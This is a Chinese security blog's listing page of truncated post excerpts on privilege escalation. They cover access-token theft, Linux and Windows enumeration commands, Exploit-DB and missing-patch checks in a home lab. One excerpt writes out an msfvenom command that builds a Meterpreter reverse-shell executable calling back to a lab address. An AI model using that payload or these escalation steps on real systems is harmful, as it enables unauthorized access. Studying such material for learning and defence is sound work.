提权

2020-04-02Gu阅读(9865)评论(0)赞(15)

误区 当前我获得了一个普通域用户权限的shell，利用令牌窃取进行提权，提权到管理员权限。哈哈，提权好简单。胡扯！ 看了很多博客，其中几篇文章就这样带有误导性地写，这样不好吧。 访问令牌的定义 描述进程或者线程安全上下文的一个对象。不同的用...

2020-02-05Gu阅读(1655)评论(0)赞(0)

记录一下关于Linux提权相关的命令 获取系统信息 cat /etc/issue 查看发行版 cat /etc/*-release 查看发行版 cat /proc/version uname -a 查看内核版本 rpm -q kernel ...

2020-01-30Gu阅读(2092)评论(0)赞(0)

上线 先利用命令生成一个马： msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.151 lport=2345 -f exe >hackergugu.exe 然后...

2019-12-24Gu阅读(3263)评论(0)赞(0)

exploitdb Exploit Database（https://github.com/offensive-security/exploit-database）这是Offensive Security（https://www.offen...

2019-12-06Gu阅读(2935)评论(0)赞(0)

我们要提权一台低权限的主机，需要快速定位该主机打了哪些补丁，没打哪些补丁。 wmic qfe get hotfixid——可查看主机存在的补丁。 我们也可以执行以下命令，确定机器没有的补丁，来进行提权 systeminfo>gu.tx...

2019-12-04Gu阅读(1715)评论(0)赞(0)

##前言 我利用虚拟机搭建了一个win7的靶机环境，学习一下，本地提权前的信息搜集 ##信息搜集 条件：WebShell shell分为交互式shell和非交互式shell： 交互式就是shell等待你输入的命令，并且执行你提交的命令。 非...